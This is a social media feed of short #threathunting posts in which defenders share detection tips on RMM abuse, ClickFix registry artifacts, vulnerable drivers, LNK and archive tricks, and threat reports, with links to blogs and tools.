Recent searches
Search options
#threathunting
Latest Dispatch: HEARTH
HEARTH (Hunting Exchange and Research Threat Hub) is an open-source project for sharing and refining threat hunting ideas.
Learn what it is and how to contribute: https://dispatch.thorcollective.com/p/introducing-hearth
@deepthoughts10 @threatinsight Bluetrait doesn’t appear to be on LOLRMM yet, I’ll try to submit it for addition.
Further to Brian’s excellent recommendation, I strongly recommend taking all the LOLRMM domains and file installations paths and running a baseline search against your environment, identify/allowlist authorized RMM solutions used, and hard blocking the rest. Since most TAs use the legitimate stock binaries, security teams can score quick wins with this method.
Work with your IT helpdesk teams to identify which RMM tool they use when you inevitably start seeing RMM usage in your logs. RMM usage is unfortunately more prevalent than one would guess, malicious or not. Think third party vendor troubleshooting calls, rogue employee installs, and random driveby RMM connections when users search for help via their favorite search engine.
Finally, don’t count out remote session takeovers using MS Teams, Zoom, and other collaboration tools. DPRK remote IT workers will use this functionality to remotely control devices they aren’t sitting in front of. Recommend checking your org’s official collab tool of choice for remote control functionality and turning it off at the org level, if possible. Otherwise, detection engineering for use and abuse of a legitimate application feature used by thousands in your org is like searching for needles in the proverbial haystack.
New Dispatch Drop
Attackers will get in—just give them time.
In this week's THOR Collective Dispatch, we talk why security teams must test their defenses: https://dispatch.thorcollective.com/p/why-cybersecurity-teams-need-to-test
Hunt for the stupidest things imaginable and you will be victorious. #threathunting
Friday's used to be relaxing. Now they're spent wondering how to build adhoc tables in logscale so I can explain why cmd - leads to a multi-stage malware deployment.
#crowdstrike #threathunting
At SCinet 2024, Eldon Koyle, Principal Technical Marketing Engineer at Corelight, was threat hunting using data from Corelight sensors in one of the fastest, most open research networks ever created.
His key takeaway? Context is everything.
In high-speed environments, security teams can’t rely solely on alerts. They need data that paints a clearer picture of any suspicious behavior on the network. Enriched network logs provide critical visibility, helping threat hunters connect the dots and make more informed decisions in real time.
With vast amounts of data moving across the network, how do you ensure your security team has the visibility needed to identify and assess threats before they escalate? Read Eldon’s full insight his latest blog 
https://corelight.com/blog/threat-hunting-at-scinet-24?utm_source=msdtn&utm_medium=organic-social&utm_campaign=blog&utm_adgroup=SCinet2024&utm_content=quote
PowerShell tools to help defenders hunt smarter, hunt harder
Whenever you run something inside a Windows Run dialog box, apparently it gets saved to the registry under the RunMRU key.
This can be helpful for those of you hunting for ClickFix / ClearFake campaign activity since anything executed after the run dialog has a better chance of blending into benign activity.
Building regex patterns on the registry key values can help uncover any malicious commands with multiple arguments.
#clickfix #clearfake #threathunting
https://forensafe.com/blogs/runmrukey.html
New THOR Collective Dispatch post
In Part 5 of @jotunvillur.bsky.social and my DEATHCon Thrunting Workshop series, we use advanced data analysis to find threats in HTTP datasets.
Full post here: https://dispatch.thorcollective.com/p/a-deathcon-thrunting-workshop-overview-a4b
Looks like X/Twitter Grok has a way to share files now. Could be used to distribute malware. I recommend hunting for this and/or blocking this URL pattern.
From: @GossiTheDog
https://cyberplace.social/@GossiTheDog/114103639865734868
I found this useful Gist when looking up ways to execute commands from ADS. There are more possibilities than I thought.
#threathunting
https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
#BYOVD attacks are slowly becoming more common for threat actors to escalate privilege and kill security tools.
Make sure you're #ThreatHunting for new Vulnerable Drivers!
Win 11 now has a Vulnerable Driver Blocklist feature, however, it's only updated in major updates so you still need to monitor for recently discovered Vulnerable Drivers.
Recent Vuln Driver: https://www.bleepingcomputer.com/news/security/ransomware-gangs-exploit-paragon-partition-manager-bug-in-byovd-attacks/
Known Vuln Drivers: https://www.loldrivers.io/
Vuln Driver Blocklist: https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules
Looking for a fun #CyberSecurity #Infosec project? 
Want to practice your #ThreatHunting 
and #Detection 
skills?
Install the NEW #SecurityOnion 
2.4.120 in a VM:
https://docs.securityonion.net/en/2.4/first-time-users.html
Then follow along with our recent quick #malware analysis posts:
https://blog.securityonion.net/search/label/quick%20malware%20analysis
Good day everyone!
An APT group known as Angry Likho (a.k.a. Sticky Werewolf) is being monitored by Kaspersky's Securelist researchers and they have identified hundreds of victims of a recent attack in Russia, several in Belarus, and additional incidents in other countries. They used an age-old technique of spear-phishing to gain initial access that had various attachments that would contain the legitimate bait file as well as other files, in some cases malicious LNK files. Execution would lead to a newly discovered implant named FrameworkSurvivor.exe.
As usual, check out all the juicy details that I left out and enjoy the read! Happy Hunting!
Angry Likho: Old beasts in a new forest
https://securelist.com/angry-likho-apt-attacks-with-lumma-stealer/115663/
Intel 471 Cyborg Security, Now Part of Intel 471 #ThreatIntel #ThreatHunting #ThreatDetection #HappyHunting #readoftheday
Also with that recent 7-Zip vulnerability I've started to pay more attention to what file attributes are visible in archive files.
One note from the link above:
I find .img files to be the best because they don’t require external software for extraction and can effectively hide files. In contrast, opening a ZIP file with WinRAR will reveal hidden files
Then there was this report from Proofpoint in December:
However, if the RAR is opened in 7-Zip, the user can view and extract the NTFS ADS streams on Windows systems (NTFS file formatted system)
https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats
#ThreatHunting #ThreatIntel
Idk what it is about LNK files that makes campaigns so interesting. It's one of those file types that doesn't seem to have direct detections for that carry a lot of options.
#RedTeam #ThreatHunting
https://lorenzomeacci.com/advanced-initial-access-techniques
Whoa, malware trends in Q1/25 are getting seriously wild! 
AsyncRAT via TryCloudflare, Lynx Ransomware, Lumma Stealer popping up on GitHub... it's just escalating.
Here's the deal: tons of companies *think* their security is rock solid, but attackers are constantly leveling up their social engineering game – just look at InvisibleFerret. And then, bam! "Oh no, we've been hacked!" rings alarmingly too often.
Frankly, we need more pentests and proactive threat hunting. Automated scans? Sure, they're useful, but they're no substitute for experienced pros. What's your take on these new malware campaigns? What actually works for you? 
Tired of getting ghosted by endless events? The five-number summary is your threat-hunting sidekick.
Check out our latest THOR Collective Dispatch for the full breakdown.
Join us: https://dispatch.thorcollective.com/p/stop-chasing-ghosts-how-five-number